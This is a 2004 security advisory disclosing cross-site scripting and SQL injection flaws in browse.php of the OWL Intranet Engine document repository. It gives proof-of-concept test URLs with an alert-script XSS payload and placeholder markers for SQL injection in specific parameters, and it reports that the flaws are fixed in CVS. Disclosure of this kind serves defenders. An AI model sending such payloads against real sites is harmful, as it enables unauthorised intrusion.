<<< Date Index >>>     <<< Thread Index >>>

Various Vulnerabilities in OWL Intranet Engine



----------------------------------------------------------------------------
               Various Vulnerabilities in OWL Intranet Engine
----------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004 
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OWL 0.7 and 0.8 -  Owl is a multi user document repository
(knowledgebase) 
system written in PHP4 for publishing files/documents onto the web for
a 
corporation, small business, group of people, or just for yourself.

Web : http://owl.sourceforge.net/

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Cross Site Scripting Vulnerabilities

A1. In the script browser various parameters, that are used to write the
html code, not are verified. 

        Test URLS : 


http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1'><script>alert(document.location)</script>&order=creatorid&sortposted=DESC


http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1&order=creatorid'><script>alert(document.location)</script>&sortposted=DESC


B. SQL Injection Vulnerabilities

B1. In the browser.php script the following parameters are vulnerables
to an
SQL Injection attacks.

        Test URLS : 
        

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104[SQL%20INJECTION]&expand=1&order=creatorid&sortposted=DESC

http://<site-with-owl>/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104&expand=1&order=creatorid&sortposted=DESC[SQL%20INJECTION]


The fix:
~~~~~~~~

All problems are fixed in the CVS.

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es



Attachment: signature.asc
Description: This is a digitally signed message part